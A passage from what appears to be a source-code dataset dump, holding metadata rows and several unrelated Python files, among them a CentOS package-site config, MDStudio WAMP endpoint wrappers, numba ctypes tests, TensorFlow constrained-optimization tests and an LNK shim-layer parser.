| 180
| 0.121869
|
af55a7c4bf87a19d17230ce48e8785f847954198
| 891
|
py
|
Python
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 9
|
2016-04-17T02:09:47.000Z
|
2022-02-16T15:50:43.000Z
|
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | null | null | null |
config.py
|
johannes-gehrs/centos_packages
|
31afe052011594e37175447eae8e7a192bdc9669
|
[
"MIT"
] | 6
|
2016-09-10T17:42:29.000Z
|
2021-11-28T09:06:36.000Z
|
from __future__ import absolute_import, division, unicode_literals
import os
import logging
OS_VERSIONS = ['6', '7']
DATA_DIR = '/tmp/centos_packages/'
REPO_BASE_URL = 'http://mirror.centos.org/centos/'
REPOSITORIES = ['os', 'updates', 'centosplus', 'extras', 'fasttrack']
REPOSITORIES_PRETTY = {'os': 'Base',
'updates': 'Updates',
'extras': 'Extras',
'fasttrack': 'Fasttrack'}
LIMIT_RESULTS = 250
CACHE_MAX_AGE = 4260
CACHE_IN_DEBUG_MODE = False
def active_repos():
return [repo for repo in REPOSITORIES if not repo == 'centosplus']
# Logging
LOGDIR = DATA_DIR + 'log/'
LOGFILE = LOGDIR + 'centos_packages.log'
if not os.path.isdir(LOGDIR):
os.makedirs(LOGDIR)
logging.basicConfig(filename=LOGFILE,
level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s')
| 29.7
| 70
| 0.637486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 261
| 0.292929
|
af5737ecd87101e9cae87c5d6f7ba311642b6a63
| 2,622
|
py
|
Python
|
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
bin/autogen.py
|
botleague/leaderboard-generator
|
644bed2b056d04b604a09ab4f1ad78afbc4ceee7
|
[
"MIT"
] | null | null | null |
import os
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
def main():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# Don't need Firestore for HTML dev
os.environ['SHOULD_USE_FIRESTORE'] = 'false'
from leaderboard_generator.config import config
# Catch up with unwatched changes
generate()
path = config.root_dir
event_handler = AutoGenTrigger()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def in_html_dir(path):
from leaderboard_generator.config import config
in_static = path.startswith(config.static_dir)
in_templates = path.startswith(config.template_dir)
ret = in_static or in_templates
return ret
def generate():
from leaderboard_generator.generate_site import generate
generate()
class AutoGenTrigger(FileSystemEventHandler):
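    # Watchdog handler: regenerate the static site when files under the HTML directories change.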
def __init__(self):
super(AutoGenTrigger, self).__init__()
self.last_gen_time = -1
def on_moved(self, event):
super(AutoGenTrigger, self).on_moved(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Moved %s: from %s to %s", what, event.src_path,
event.dest_path)
def on_created(self, event):
super(AutoGenTrigger, self).on_created(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Created %s: %s", what, event.src_path)
def on_deleted(self, event):
super(AutoGenTrigger, self).on_deleted(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Deleted %s: %s", what, event.src_path)
def on_modified(self, event):
super(AutoGenTrigger, self).on_modified(event)
what = 'directory' if event.is_directory else 'file'
logging.debug("Modified %s: %s", what, event.src_path)
if event.is_directory:
return
if not in_html_dir(event.src_path):
return
if any(x in event.src_path for x in ['___jb']):
return
if self.last_gen_time == -1 or time.time() - self.last_gen_time > 5:
logging.info("Modified %s: %s", what, event.src_path)
generate()
self.last_gen_time = time.time()
if __name__ == '__main__':
main()
| 28.5
| 76
| 0.644165
| 1,443
| 0.550343
| 0
| 0
| 0
| 0
| 0
| 0
| 319
| 0.121663
|
af57910bb3fe47ba44e22a72e31f84c5bdcbf609
| 10,239
|
py
|
Python
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 10
|
2017-09-14T07:26:15.000Z
|
2021-04-01T09:33:03.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 117
|
2017-09-13T08:09:48.000Z
|
2019-10-03T12:19:13.000Z
|
mdstudio/mdstudio/api/endpoint.py
|
NLeSC/LIEStudio
|
03c163b4a2590b4e2204621e1c941c28a9624887
|
[
"Apache-2.0"
] | 1
|
2018-09-26T09:40:51.000Z
|
2018-09-26T09:40:51.000Z
|
import json
import uuid
import six
from datetime import timedelta
from types import GeneratorType
from typing import Union, Optional, Callable
from jsonschema import ValidationError
from twisted.internet.defer import _inlineCallbacks, Deferred
from autobahn.wamp import RegisterOptions
from mdstudio.api.api_result import APIResult
from mdstudio.api.converter import convert_obj_to_json
from mdstudio.api.request_hash import request_hash
from mdstudio.api.schema import (ISchema, EndpointSchema, validate_json_schema, ClaimSchema,
MDStudioClaimSchema, InlineSchema, MDStudioSchema)
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
SchemaType = Union[str, dict, ISchema]
def validation_error(schema, instance, error, prefix, uri):
return \
'{prefix} validation on uri "{uri}" failed on "{property}": \n' \
'Subschema:\n{subschema}\ndid not match actual value:\n{subproperty}'.format(
prefix=prefix,
uri=uri,
property='.'.join(error.schema_path),
subschema=json.dumps(error.schema, indent=2),
subproperty=json.dumps(error.instance, indent=2)
)
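# Wraps an endpoint function so that claims, the request and the result are all validated
# against their JSON schemas around the wrapped call.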
class WampEndpoint(object):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
from mdstudio.component.impl.common import CommonSession
self.uri_suffix = uri
self.uri = None
self.options = options
self.scope = scope
self.instance = None # type: CommonSession
self.wrapped = wrapped_f
self.input_schema = self._to_schema(input_schema, EndpointSchema)
self.output_schema = self._to_schema(output_schema, EndpointSchema)
self.claim_schemas = [MDStudioClaimSchema(CommonSession)]
claim_schema = self._to_schema(claim_schema, ClaimSchema, {})
if claim_schema:
self.claim_schemas.append(claim_schema)
def set_instance(self, instance):
self.instance = instance
self.uri = u'{}.{}.endpoint.{}'.format(
self.instance.component_config.static.vendor,
self.instance.component_config.static.component,
self.uri_suffix
)
def register(self):
return self.instance.register(self, self.uri, options=self.options)
def __call__(self, request, signed_claims=None):
return self.execute(request, signed_claims)
@chainable
def execute(self, request, signed_claims):
if not signed_claims:
return_value(APIResult(error='Remote procedure was called without claims'))
from mdstudio.component.impl.common import CommonSession
request = convert_obj_to_json(request)
claims = yield super(CommonSession, self.instance).call(u'mdstudio.auth.endpoint.verify', signed_claims)
claim_errors = self.validate_claims(claims, request)
if claim_errors:
return_value(claim_errors)
request_errors = self.validate_request(request)
if request_errors:
return_value(request_errors)
result = self.call_wrapped(request, claims['claims'])
if isinstance(result, GeneratorType):
result = _inlineCallbacks(None, result, Deferred())
result = yield result
result = result if isinstance(result, APIResult) else APIResult(result)
convert_obj_to_json(result)
        if 'error' in result:
            return_value(result)
        result_errors = self.validate_result(result.data)
        if result_errors:
            return_value(result_errors)
return_value(result)
def call_wrapped(self, request, claims):
return self.wrapped(self.instance, request, claims)
def validate_claims(self, claims, request):
if 'error' in claims:
res = APIResult(error=claims['error'])
elif 'expired' in claims:
res = APIResult(expired=claims['expired'])
else:
claims = claims['claims']
if claims['requestHash'] != request_hash(request):
res = APIResult(error='Request did not match the signed request')
elif claims['uri'] != self.uri:
res = APIResult(error='Claims were obtained for a different endpoint')
elif claims['action'] != 'call':
res = APIResult(error='Claims were not obtained for the action "call"')
else:
s = None
try:
for s in self.claim_schemas:
validate_json_schema(s.to_schema(), claims)
except ValidationError as e:
res = {'error': validation_error(s.to_schema(), claims, e, 'Claims', self.uri)}
self.instance.log.error('{error_message}', error_message=res['error'])
else:
if not self.instance.authorize_request(self.uri, claims):
res = APIResult(error='Unauthorized call to {}'.format(self.uri))
self.instance.log.error('{error_message}', error_message=res['error'])
else:
# Everything is OK, no errors
res = None
return res
def validate_request(self, request):
schema = self.input_schema.to_schema()
try:
validate_json_schema(schema, request)
except ValidationError as e:
return APIResult(error=validation_error(schema, request, e, 'Input', self.uri))
else:
# No validation errors
return None
def validate_result(self, result):
schema = self.output_schema.to_schema()
try:
validate_json_schema(schema, result)
except ValidationError as e:
res = APIResult(error=validation_error(schema, result, e, 'Output', self.uri))
else:
# No validation errors
res = None
return res
@staticmethod
def _to_schema(schema, schema_type, default_schema=None):
if isinstance(schema, (six.text_type, str)):
schema = schema_type(schema)
elif isinstance(schema, dict):
schema = InlineSchema(schema)
elif isinstance(schema, (schema_type, InlineSchema)):
schema = schema
elif not schema:
schema = InlineSchema({} if default_schema == {} else default_schema or {'type': 'null'})
else:
raise NotImplementedError('{} of type {} is not supported'.format(schema_type.__name__, type(schema)))
return schema
class CursorWampEndpoint(WampEndpoint):
def __init__(self, wrapped_f, uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
input_schema = InlineSchema({
'oneOf': [
{
'allOf': [
self._to_schema(input_schema, EndpointSchema),
self._to_schema('cursor-parameters/v1', MDStudioSchema)
]
},
self._to_schema('cursor-request/v1', MDStudioSchema),
]
})
output_schema = InlineSchema({
'allOf': [
self._to_schema(output_schema, EndpointSchema),
{
'properties': {
'results': self._to_schema('cursor-response/v1', MDStudioSchema)
}
}
]
})
super(CursorWampEndpoint, self).__init__(wrapped_f, uri, input_schema, output_schema, claim_schema, options, scope)
@chainable
def call_wrapped(self, request, claims):
meta = None
cid = None
if 'next' in request:
cid = request['next']
elif 'previous' in request:
cid = request['previous']
if cid:
meta = json.loads(self.instance.session.cache.extract('cursor#{}'.format(cid)))
if meta.get('uuid') != cid:
return_value(APIResult(error='You tried to get a cursor that doesn\'t exist or is expired. Please check your code.'))
if not meta:
meta = None
paging = {
'uri': self.uri
}
if 'paging' in request and 'limit' in request['paging']:
paging['limit'] = request['paging']['limit']
result, prev, nxt = yield self.wrapped(self.instance, request, claims['claims'], **{'paging': paging, 'meta': meta})
if prev:
prev_uuid = uuid.uuid4()
prev['uuid'] = prev_uuid
paging['previous'] = prev_uuid
self.instance.session.cache.put('cursor#{}'.format(prev_uuid), timedelta(minutes=10), json.dumps(prev))
        if nxt:
next_uuid = uuid.uuid4()
nxt['uuid'] = next_uuid
paging['next'] = next_uuid
self.instance.session.cache.put('cursor#{}'.format(next_uuid), timedelta(minutes=10), json.dumps(nxt))
        if not ('paging' in request and 'addPageInfo' in request['paging'] and request['paging']['addPageInfo']):
paging = {
'uri': paging['uri']
}
return_value({
'results': result,
'paging': paging
})
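# Decorator factories: wrap a session method as a WampEndpoint or CursorWampEndpoint with the given schemas.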
def endpoint(uri, input_schema, output_schema=None, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return WampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
def cursor_endpoint(uri, input_schema, output_schema, claim_schema=None, options=None, scope=None):
# type: (str, SchemaType, Optional[SchemaType], Optional[SchemaType], Optional[RegisterOptions], Optional[str]) -> Callable
def wrap_f(f):
return CursorWampEndpoint(f, uri, input_schema, output_schema, claim_schema, options, scope)
return wrap_f
| 38.205224
| 133
| 0.614611
| 8,278
| 0.808477
| 3,003
| 0.29329
| 3,652
| 0.356675
| 0
| 0
| 1,386
| 0.135365
|
af58316a61820a09a31e0f30a7a6aca3f04dde99
| 861
|
py
|
Python
|
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | 1
|
2022-02-21T07:05:48.000Z
|
2022-02-21T07:05:48.000Z
|
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | null | null | null |
chap6/6-4.py
|
StewedChickenwithStats/Answers-to-Python-Crash-Course
|
9ffbe02abba5d111f702d920db7932303daf59d4
|
[
"MIT"
] | null | null | null |
codewords={
'array':'an arrangement of aerials spaced to give desired directional characteristics',
'byte':'computer memory unit',
'boolean':'a data type with only two possible values: true or false',
'debug':'locate and correct errors in a computer program code',
'address':'the code that identifies where a piece of information is stored'
}
# add five words
codewords['append']='a procedure for concatenating (linked) lists or arrays in some high-level programming languages'
codewords['adapter']='device that enables something to be used in a way different from that for which it was intended or makes different pieces of apparatus compatible'
codewords['constant']='a non-varying value'
codewords['branch']='a division of a stem'
codewords['copy']='reproduce or make an exact copy of'
# print all words
for k,v in codewords.items():
print(k+": "+v)
| 45.315789
| 168
| 0.759582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 716
| 0.831591
|
af5b9601c04d7552ac03872881009c7fc625c108
| 1,832
|
py
|
Python
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
numba/tests/test_ctypes.py
|
meawoppl/numba
|
bb8df0aee99133c6d52465ae9f9df2a7996339f3
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function, absolute_import, division
from ctypes import *
import sys
from numba import unittest_support as unittest
from numba.compiler import compile_isolated
from numba import types
is_windows = sys.platform.startswith('win32')
if not is_windows:
proc = CDLL(None)
c_sin = proc.sin
c_sin.argtypes = [c_double]
c_sin.restype = c_double
def use_c_sin(x):
return c_sin(x)
ctype_wrapping = CFUNCTYPE(c_double, c_double)(use_c_sin)
def use_ctype_wrapping(x):
return ctype_wrapping(x)
savethread = pythonapi.PyEval_SaveThread
savethread.argtypes = []
savethread.restype = c_void_p
restorethread = pythonapi.PyEval_RestoreThread
restorethread.argtypes = [c_void_p]
restorethread.restype = None
def use_c_pointer(x):
"""
Running in Python will cause a segfault.
"""
threadstate = savethread()
x += 1
restorethread(threadstate)
return x
@unittest.skipIf(is_windows, "Test not supported on windows")
class TestCTypes(unittest.TestCase):
def test_c_sin(self):
pyfunc = use_c_sin
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_wrapping(self):
pyfunc = use_ctype_wrapping
cres = compile_isolated(pyfunc, [types.double])
cfunc = cres.entry_point
x = 3.14
self.assertEqual(pyfunc(x), cfunc(x))
def test_ctype_voidptr(self):
pyfunc = use_c_pointer
# pyfunc will segfault if called
cres = compile_isolated(pyfunc, [types.int32])
cfunc = cres.entry_point
x = 123
        self.assertEqual(cfunc(x), x + 1)
if __name__ == '__main__':
unittest.main()
| 24.105263
| 64
| 0.662664
| 717
| 0.391376
| 0
| 0
| 779
| 0.425218
| 0
| 0
| 144
| 0.078603
|
af5d86c2560d06e00d095d4daa7efcc3669f67c7
| 377
|
py
|
Python
|
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
test_Task1D.py
|
dan7267/1a-flood-risk-project-93
|
d95cee987f5673d637626e1804f719371a25daa8
|
[
"MIT"
] | null | null | null |
from floodsystem.geo import rivers_with_station
from floodsystem.geo import stations_by_river
from floodsystem.station import MonitoringStation
def test_rivers_with_station():
lst2 = rivers_with_station(MonitoringStation)
assert len(lst2) == len(set(lst2))
def test_stations_by_river():
dct1 = stations_by_river(MonitoringStation)
assert type(dct1) == dict
| 26.928571
| 49
| 0.795756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af5fa4a7f4a8959df414d7dee58cac1a11ceef7d
| 875
|
py
|
Python
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | 1
|
2021-05-22T02:46:00.000Z
|
2021-05-22T02:46:00.000Z
|
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
Preprocessing/PreprocessingX: Chunking.py
|
Om4AI/Semantic-Adherence-Checker-with-NLP
|
7104f0fbe45ef79eb6ea0db9eec4dc7b4ff150fb
|
[
"MIT"
] | null | null | null |
import nltk
from nltk.tokenize import PunktSentenceTokenizer
def chunk_process(corpus):
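    # Sentence-tokenize each document, then keep only noun/adjective tokens.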
all_processed = []
for i in corpus:
train_text = i
train_text = train_text.lower()
custom_tokenizer = PunktSentenceTokenizer(train_text)
tokenized = custom_tokenizer.tokenize(train_text)
pro = chunk_process_content(tokenized)
all_processed.append(pro)
return all_processed
def chunk_process_content(tokenized):
processed = []
for i in tokenized:
words = nltk.word_tokenize(i)
        # Tags the words as nouns, adjectives etc. (parts of speech)
tagged = nltk.pos_tag(words)
# print(tagged)
# Extract the required words from the corpus
pos = ["NN","NNS","NNP","JJR","JJS","NNPS","JJ"]
for (a,b) in tagged:
if b in pos:
processed.append(a)
# print(processed)
# t = set(processed)
t = []
for i in processed:
if i not in t: t.append(i)
# print(t)
processed = t
return processed
| 23.648649
| 57
| 0.666286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 188
| 0.214857
|
af5fcb0196a0a9c57b0c130032cf305a83d559c5
| 1,036
|
py
|
Python
|
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
flask_monitoringdashboard/test/db/test_codeline.py
|
jlane9/Flask-MonitoringDashboard
|
b989bcf8f870ccd9141210eb4b2b8f716873c4fe
|
[
"MIT"
] | null | null | null |
"""
This file contains all unit tests that count a number of results in the database. (Corresponding to the file:
'flask_monitoringdashboard/database/count.py')
See info_box.py for how to run the test-cases.
"""
import unittest
from flask_monitoringdashboard.database import session_scope
from flask_monitoringdashboard.database.code_line import get_code_line
FN = 'filename'
LN = 42
FUN = 'fun'
CODE = 'code'
class TestCodeLine(unittest.TestCase):
def test_get_code_line(self):
with session_scope() as db_session:
code_line1 = get_code_line(db_session, FN, LN, FUN, CODE)
code_line2 = get_code_line(db_session, FN, LN, FUN, CODE)
self.assertEqual(code_line1.id, code_line2.id)
self.assertEqual(code_line1.function_name, code_line2.function_name)
self.assertEqual(code_line1.filename, code_line2.filename)
self.assertEqual(code_line1.line_number, code_line2.line_number)
self.assertEqual(code_line1.code, code_line2.code)
| 35.724138
| 113
| 0.726834
| 608
| 0.586873
| 0
| 0
| 0
| 0
| 0
| 0
| 244
| 0.235521
|
af621cd414c91141313b31734d2740e917380a97
| 6,772
|
py
|
Python
|
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for subsettable_context.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_constrained_optimization.python.rates import subsettable_context
def create_contexts():
"""Returns a pair of `SubsettableContext`s to use in tests.
We'll refer to the two contexts as "context1" and "context2". Both are subsets
of the same parent context, which has:
penalty_predicate = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0]
constraint_predicate = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
context1 is subsetted from the parent context using:
penalty_predicate1 = [0, 0, 1, 1, 1, 1, 0, 0, 0, 0]
constraint_predicate1 = [1, 1, 0, 0, 0, 0, 1, 1, 1, 1]
  while context2 is subsetted from the parent context using:
penalty_predicate2 = [0, 0, 0, 0, 1, 1, 1, 1, 0, 0]
constraint_predicate2 = [1, 1, 1, 1, 0, 0, 0, 0, 1, 1]
Returns:
The pair (context1, context2).
"""
predictions = tf.constant(0.0, dtype=tf.float32, shape=(1,))
context = subsettable_context.rate_context(predictions)
penalty_predicate = tf.constant(
[True, False, True, False, True, False, True, False, True, False],
dtype=tf.bool)
constraint_predicate = tf.constant(
[False, True, False, True, False, True, False, True, False, True],
dtype=tf.bool)
context = context.subset(penalty_predicate, constraint_predicate)
penalty_predicate1 = tf.constant(
[False, False, True, True, True, True, False, False, False, False],
dtype=tf.bool)
constraint_predicate1 = tf.constant(
[True, True, False, False, False, False, True, True, True, True],
dtype=tf.bool)
penalty_predicate2 = tf.constant(
[False, False, False, False, True, True, True, True, False, False],
dtype=tf.bool)
constraint_predicate2 = tf.constant(
[True, True, True, True, False, False, False, False, True, True],
dtype=tf.bool)
context1 = context.subset(penalty_predicate1, constraint_predicate1)
context2 = context.subset(penalty_predicate2, constraint_predicate2)
return context1, context2
class SubsettableContextTest(tf.test.TestCase):
"""Tests for `SubsettableContext` class."""
def test_subset_of_subset(self):
"""Tests that taking the subset-of-a-subset works correctly."""
context1, context2 = create_contexts()
context1_penalty_predicate = context1.penalty_predicate.predicate
context1_constraint_predicate = context1.constraint_predicate.predicate
context2_penalty_predicate = context2.penalty_predicate.predicate
context2_constraint_predicate = context2.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that the subset of a subset ANDs the conditions together in
# condition1.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context1_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context1_constraint_predicate))
# Likewise in condition2.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context2_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context2_constraint_predicate))
def test_and(self):
"""Tests `SubsettableContext`'s logical AND operator."""
context1, context2 = create_contexts()
and_context = context1 & context2
and_context_penalty_predicate = and_context.penalty_predicate.predicate
and_context_constraint_predicate = (
and_context.constraint_predicate.predicate)
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that AND applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(and_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(and_context_constraint_predicate))
def test_or(self):
"""Tests `SubsettableContext`'s logical OR operator."""
context1, context2 = create_contexts()
or_context = context1 | context2
or_context_penalty_predicate = or_context.penalty_predicate.predicate
or_context_constraint_predicate = or_context.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that OR applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(or_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(or_context_constraint_predicate))
if __name__ == "__main__":
tf.test.main()
| 42.591195
| 80
| 0.656379
| 3,849
| 0.56837
| 0
| 0
| 0
| 0
| 0
| 0
| 1,894
| 0.279681
|
af623410296e659a3a4c8fe5f812620f14b8f668
| 1,098
|
py
|
Python
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 6
|
2019-04-16T10:19:15.000Z
|
2022-03-18T22:21:18.000Z
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 12
|
2020-09-15T08:02:48.000Z
|
2021-07-19T13:52:57.000Z
|
LnkParse3/extra/shim_layer.py
|
ernix/LnkParse3
|
ab8b2c796a501b103eb74142762e7fe9f4f1960a
|
[
"MIT"
] | 3
|
2019-10-10T06:38:48.000Z
|
2020-10-25T08:24:34.000Z
|
from LnkParse3.extra.lnk_extra_base import LnkExtraBase
"""
------------------------------------------------------------------
| 0-7b | 8-15b | 16-23b | 24-31b |
------------------------------------------------------------------
| <u_int32> BlockSize >= 0x00000088 |
------------------------------------------------------------------
| <u_int32> BlockSignature == 0xA0000008 |
------------------------------------------------------------------
| <unicode_str> LayerName |
| ? B |
------------------------------------------------------------------
"""
class ShimLayer(LnkExtraBase):
def name(self):
return "SHIM_LAYER_BLOCK"
def layer_name(self):
start = 8
binary = self._raw[start:]
text = self.text_processor.read_string(binary)
return text
def as_dict(self):
tmp = super().as_dict()
tmp["layer_name"] = self.layer_name()
return tmp
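# --- Hedged illustration (not part of the original module) ---
# The block layout documented above can also be unpacked with the standard
# struct module alone; this sketch assumes LayerName is a NUL-terminated
# UTF-16-LE string. LnkParse3's own text_processor may handle cases this does not.
import struct

def parse_shim_layer(raw: bytes) -> dict:
    """Decode BlockSize, BlockSignature and LayerName from a SHIM_LAYER block."""
    block_size, signature = struct.unpack_from("<II", raw, 0)
    if signature != 0xA0000008:
        raise ValueError("not a SHIM_LAYER block")
    layer_name = raw[8:block_size].decode("utf-16-le").split("\x00", 1)[0]
    return {"block_size": block_size, "layer_name": layer_name}

# Example with a hand-built 0x88-byte block containing the layer name "WIN7RTM".
sample = struct.pack("<II", 0x88, 0xA0000008) + "WIN7RTM".encode("utf-16-le").ljust(0x80, b"\x00")
print(parse_shim_layer(sample))  # {'block_size': 136, 'layer_name': 'WIN7RTM'}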
| 35.419355
| 66
| 0.327869
| 360
| 0.327869
| 0
| 0
| 0
| 0
| 0
| 0
| 707
| 0.643898
|
af6294e18a82ba001ab631ad5741ea18cea1db0a
| 849
|
py
|
Python
|
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
Sec 2 - Python Refresher/13_Destructuring_Variables/DestructVars.py
|
BrentLittle/WebDevPython
|
14f646c10643ab06ac4217a44b7ad6c47a7270d8
|
[
"MIT"
] | null | null | null |
t = (5,11)
x , y = t
print(x,y)
attendance = {"Rolf": 96, "Bob": 80, "Anne" :100}
print(list(attendance.items()))
for t in attendance.items() :
print(t)
# print(f"{student}: {attended}")
for student, attended in attendance.items() :
print(f"{student}: {attended}")
# Blog post: https://blog.tecladocode.com/destructuring-in-python/
people = [("Bob",42,"Mechanic"), ("James",24,"Artist"), ("Harry",32,"Lecturer")]
for name, age, profession in people:
print(f"Name: {name}, Age: {age}, Profession: {profession}")
for person in people:
print(f"Name: {person[0]}, Age: {person[1]}, Profession: {person[2]}")
person = ("Bob",42,"Mechanic")
name, _, profession = person
print(name, _, profession)
head, two, *tail = [1,2,3,4,5]
print(head)
print(two)
print(tail)
*head, two, tail = [1,2,3,4,5]
print(head)
print(two)
print(tail)
| 22.945946
| 80
| 0.638398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 318
| 0.374558
|
af62d6c68ae4c048711e5debf87644009ac5b327
| 293
|
py
|
Python
|
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
6e449b1da6d95ab7afb532a4a76d724be666ae4f
|
[
"MIT"
] | null | null | null |
django_project_template/django_project_template/apps/app/urls.py
|
eduardolujan/django_project_template
|
